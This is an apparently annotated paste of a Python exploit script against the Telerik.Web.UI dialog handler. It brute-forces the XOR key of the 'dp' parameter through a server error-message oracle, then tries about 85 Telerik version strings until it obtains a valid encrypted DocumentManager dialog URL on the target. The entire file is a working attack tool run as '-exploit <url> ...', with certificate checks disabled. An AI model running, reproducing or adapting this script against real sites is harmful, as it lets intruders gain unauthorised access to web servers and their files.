Misbahulkeri

Untitled

Dec 13th, 2019
  1. import sys
  2. import base64
  3. import requests
  4. import re
  5. import os
  6. from platform import system
  7. import binascii
  8. from time import time as timer
  9. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  10.  
# Every probe in this script is sent with verify=False (see get_result and
# mode_brutekey); silence the per-request InsecureRequestWarning urllib3
# would otherwise print over the in-place progress display.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Request counters: total for the whole run, and per key position
# (char_requests is reset by get_key after each recovered character).
requests_sent = 0
char_requests = 0
  15.  
  16.  
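def get_result(plaintext, key, session, pad_chars):
    """Send one oracle probe and report whether it triggered the array-bounds error.

    ``plaintext`` is XORed with ``key`` (see ``encrypt``), padded with the
    leading characters of ``pad_chars`` so the XOR output length becomes a
    multiple of four (this assumes len(plaintext) == len(key), which is how
    test_keychar calls it), base64-encoded and sent as the ``dp`` query
    parameter of the target URL in ``sys.argv[2]``.

    Returns True only when the response body contains an "Error Message:"
    block whose text is exactly "Index was outside the bounds of the array.";
    any other outcome (different error, no error block) returns False.
    Increments the module-level ``requests_sent`` and ``char_requests``
    counters once per call.

    Raises whatever ``requests`` raises on connection failure or timeout.
    """
    global requests_sent, char_requests

    url = sys.argv[2]
    # Pad the XOR output up to a multiple of 4 bytes before base64-encoding so
    # the encoded value carries no '=' padding. pad_chars is chosen by the
    # caller (test_keypos cycles through every byte value 0..255, tripled).
    base_pad = len(key) % 4
    base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]
    dp_encrypted = base64.b64encode(
        (encrypt(plaintext, key) + base).encode()
    ).decode()
    # NOTE(review): dp_encrypted is standard base64 and may contain '+' and
    # '/', which are appended to the query string without percent-encoding
    # (requests leaves '+' alone, and servers decode it as a space). Kept as
    # in the original because the oracle may depend on that exact
    # transmission — confirm before changing.
    request = requests.Request('GET', url + '?dp=' + dp_encrypted)
    request = request.prepare()
    # verify=False is deliberate for this tool (targets commonly present
    # self-signed certificates); the matching warning is silenced at import.
    # The timeout keeps a stalled target from hanging the brute force forever.
    response = session.send(request, verify=False, timeout=30)
    requests_sent += 1
    char_requests += 1

    match = re.search("(Error Message:)(.+\n*.+)(</div>)", response.text)
    return (
        match is not None
        and match.group(2) == "Index was outside the bounds of the array."
    )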
  37.  
  38.  
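def test_keychar(keychar, found, session, pad_chars):
    """Return True when the candidate key ``found + keychar`` passes every probe.

    For each of the first ``sys.argv[5]`` characters of the specially ordered
    base64 alphabet below, the probe plaintext is 'A' * len(found) followed
    by that character, so only the position under test varies between
    probes. The candidate is rejected as soon as one probe does NOT produce
    the array-bounds error (see get_result); otherwise it is accepted.

    ``sys.argv[5]`` (named "accuracy/thoroughness" in the original; a higher
    value means more probes per candidate, presumably to reduce false
    accepts) is clamped to the 64-character alphabet — the original indexed
    past the list and raised IndexError for larger values.
    """
    base64chars = (
        "A", "Q", "g", "w", "B", "R", "h", "x", "C", "S", "i", "y",
        "D", "T", "j", "z", "E", "U", "k", "0", "F", "V", "l", "1",
        "G", "W", "m", "2", "H", "X", "n", "3", "I", "Y", "o", "4",
        "J", "Z", "p", "5", "K", "a", "q", "6", "L", "b", "r", "7",
        "M", "c", "s", "8", "N", "d", "t", "9", "O", "e", "u", "+",
        "P", "f", "v", "/",
    )

    thoroughness = min(int(sys.argv[5]), len(base64chars))
    probe_prefix = base64chars[0] * len(found)
    candidate = found + keychar
    for probe_char in base64chars[:thoroughness]:
        # Progress display: overwrite the bracketed probe character in place.
        sys.stdout.write("\b\b" + probe_char + "]")
        sys.stdout.flush()
        if not get_result(probe_prefix + probe_char, candidate, session, pad_chars):
            return False
    return True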
  62.  
  63.  
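def encrypt(dpdata: str, key: str) -> str:
    """XOR ``dpdata`` with ``key``, repeating the key as needed.

    This is a plain repeating-key XOR (the same function decrypts), which is
    why the rest of this script can recover the key one character at a time
    through the server's error oracle.

    Args:
        dpdata: text to transform; each character is treated as its code point.
        key: non-empty key; reused cyclically when shorter than ``dpdata``.

    Returns:
        A string of the same length as ``dpdata``.

    Raises:
        ValueError: if ``key`` is empty (the original raised IndexError).
    """
    if not key:
        raise ValueError("key must be non-empty")
    key_len = len(key)
    return ''.join(
        chr(ord(ch) ^ ord(key[i % key_len])) for i, ch in enumerate(dpdata)
    )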
  71.  
  72.  
  73.  
def test_keypos(key_charset, unprintable, found, session):
    """Search for the key character that follows the recovered prefix ``found``.

    Every byte value 0..255 is tried as the padding character (handed to
    test_keychar tripled), and for each of those every character of
    ``key_charset`` is tested. Returns the first accepted character, or
    False if none is accepted. With ``unprintable`` set to False the
    candidate itself is drawn in the progress display; otherwise a '+'
    placeholder stands in for it.
    """
    all_bytes = ''.join(chr(code) for code in range(256))

    for pad in all_bytes:
        for keychar in key_charset:
            shown = keychar if unprintable is False else '+'
            # Rewind the six-character "c) [c]" cell and redraw it.
            sys.stdout.write("\b" * 6)
            sys.stdout.write(shown + ") [" + shown + "]")
            sys.stdout.flush()
            if test_keychar(keychar, found, session, pad * 3):
                return keychar
    return False
  100.  
  101.  
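def get_key(session):
    """Recover the dp XOR key one character at a time through the error oracle.

    Settings come from the command line: ``sys.argv[2]`` target URL (banner
    only here; get_result reads it itself), ``sys.argv[3]`` key length,
    ``sys.argv[4]`` key charset ('all' = every byte value 0..255, 'hex' =
    0-9A-F, anything else is used literally) and ``sys.argv[5]`` the
    accuracy threshold (echoed in the banner, consumed by test_keychar).

    Returns the characters recovered so far. This can be a *partial* key:
    the loop stops at the first position where no charset character is
    accepted and returns what it has (possibly ''), so callers must compare
    len(result) with the requested length before trusting it.

    The original file defined this function twice (identical bodies); the
    duplicate is removed here. The 'hex' charset also contained '0' twice,
    which cost one wasted probe per key position.
    """
    global char_requests
    found = ''
    unprintable = False

    key_length = sys.argv[3]
    key_charset = sys.argv[4]
    if key_charset == 'all':
        unprintable = True
        key_charset = ''.join(chr(i) for i in range(256))
    elif key_charset == 'hex':
        key_charset = '0123456789ABCDEF'

    print("Attacking " + sys.argv[2])
    print(
        "to find key of length [" +
        str(key_length) +
        "] with accuracy threshold [" +
        sys.argv[5] +
        "]"
    )
    print(
        "using key charset [" +
        (key_charset if unprintable is False else '- all ASCII -') +
        "]\n"
    )

    # Initialised so a key length of 0 does not hit an unbound name below.
    keychar = False
    for i in range(int(key_length)):
        pos_str = str(i + 1).zfill(2)
        sys.stdout.write("Key position " + pos_str + ": (------")
        sys.stdout.flush()
        keychar = test_keypos(key_charset, unprintable, found, session)
        if keychar is False:
            sys.stdout.write("\b"*7 + "Not found, quitting\n")
            sys.stdout.flush()
            break
        found = found + keychar
        # NOTE(review): str.encode() is UTF-8, so a recovered value >= 0x80
        # is displayed as two hex bytes rather than one.
        shown = (
            keychar
            if unprintable is False
            else '0x' + binascii.hexlify(keychar.encode()).decode()
        )
        sys.stdout.write(
            "\b"*7 + "{" + shown + "} found with " +
            str(char_requests) +
            " requests, total so far: " +
            str(requests_sent) +
            "\n"
        )
        sys.stdout.flush()
        # Per-position counter; requests_sent keeps the running total.
        char_requests = 0

    if keychar is not False:
        print("Found key: " +
              (
                  found
                  if unprintable is False
                  else "(hex) " + binascii.hexlify(found.encode()).decode()
              )
              )
        print("Total web requests: " + str(requests_sent))
    return found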
  249.  
  250.  
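def mode_brutekey():
    """Recover the dp key, then find a Telerik.Web.UI version the target accepts.

    Phase 1 recovers the key with get_key. get_key returns whatever prefix it
    managed to recover, so the result is only usable when its length equals
    the requested key length (sys.argv[3]); anything shorter aborts here
    instead of spending ~90 doomed requests in phase 2 (the original only
    rejected the empty string).

    Phase 2 builds a DocumentManager dialog-parameter blob for every known
    Telerik.Web.UI version string, encrypts it with the recovered key and
    requests sys.argv[2] with it. An HTTP 500 or an "Error Message:" block
    in the body means that version was rejected; the first URL producing
    neither is printed and treated as valid.
    """
    session = requests.Session()
    found = get_key(session)

    wanted_length = int(sys.argv[3])
    if found == '' or len(found) < wanted_length:
        if found != '':
            # get_key stopped at a position it could not solve.
            print(
                "Only " + str(len(found)) + " of " + str(wanted_length) +
                " key characters recovered, not probing versions"
            )
        return

    url_path = sys.argv[2]
    params = (
        '?DialogName=DocumentManager' +
        '&renderMode=2' +
        '&Skin=Default' +
        '&Title=Document%20Manager' +
        '&dpptn=' +
        '&isRtl=false' +
        '&dp='
    )
    versions = [
        '2007.1423', '2007.1521', '2007.1626', '2007.2918',
        '2007.21010', '2007.21107', '2007.31218', '2007.31314',
        '2007.31425', '2008.1415', '2008.1515', '2008.1619',
        '2008.2723', '2008.2826', '2008.21001', '2008.31105',
        '2008.31125', '2008.31314', '2009.1311', '2009.1402',
        '2009.1527', '2009.2701', '2009.2826', '2009.31103',
        '2009.31208', '2009.31314', '2010.1309', '2010.1415',
        '2010.1519', '2010.2713', '2010.2826', '2010.2929',
        '2010.31109', '2010.31215', '2010.31317', '2011.1315',
        '2011.1413', '2011.1519', '2011.2712', '2011.2915',
        '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',
        '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',
        '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',
        '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',
        '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',
        '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',
        '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',
        '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',
        '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',
        '2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',
        '2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',
        '2017.3.913'
    ]

    # Dialog parameter blob; the version-specific assembly reference is
    # spliced (base64-encoded) between plaintext1 and plaintext3.
    plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'
    plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='
    plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
    plaintext3 = ';AllowMultipleSelection,False,3,False'

    urls = {}
    for version in versions:
        assembly_ref = base64.b64encode(
            (plaintext2_raw1 + version + plaintext2_raw3).encode()
        ).decode()
        plaintext = base64.b64encode(
            (plaintext1 + assembly_ref + plaintext3).encode()
        ).decode()
        ciphertext = base64.b64encode(
            encrypt(plaintext, found).encode()
        ).decode()
        urls[version] = url_path + params + ciphertext

    found_valid_version = False
    for version, url in urls.items():
        request = requests.Request('GET', url).prepare()
        # verify=False: self-signed target certs are expected; the timeout
        # keeps one stalled version probe from hanging the whole run.
        response = session.send(request, verify=False, timeout=30)
        if response.status_code == 500:
            continue
        match = re.search(
            "(Error Message:)(.+\n*.+)(</div>)",
            response.text
        )
        if match is None:
            print(version + ": " + url)
            found_valid_version = True
            break

    if not found_valid_version:
        print("No valid version found")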
  340.  
  341.  
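def mode_help():
    """Print command-line usage.

    The original printed only an empty line. The positions documented here
    mirror what the dispatcher, get_key and test_keychar read from sys.argv:
    1 the mode flag, 2 the target URL, 3 the key length, 4 the key charset
    and 5 the accuracy threshold.
    """
    print("")
    print(
        "Usage: " + os.path.basename(sys.argv[0]) +
        " -exploit <url> <key_length> <charset> <accuracy_threshold>"
    )
    print("  <url>                 target URL; '?dp=' is appended as-is")
    print("  <key_length>          number of key characters to recover")
    print("  <charset>             'all' (byte values 0-255), 'hex' (0-9A-F), or a literal set of characters")
    print("  <accuracy_threshold>  1-64: base64 alphabet characters probed per key candidate")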
  344.  
  345.  
  346.  
  347.  
  348.  
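# Clear the terminal before drawing the in-place progress display. os.system
# receives a fixed literal only; no user-controlled data reaches the shell.
if system() == 'Linux':
    os.system('clear')


# Command-line dispatch. -exploit requires exactly six argv entries
# (script, mode, url, key length, charset, accuracy threshold). Any other
# invocation, including the wrong argument count, now falls through to the
# usage text instead of exiting silently as the original did.
if len(sys.argv) < 2:
    mode_help()
elif sys.argv[1] == "-exploit" and len(sys.argv) == 6:
    mode_brutekey()
else:
    mode_help()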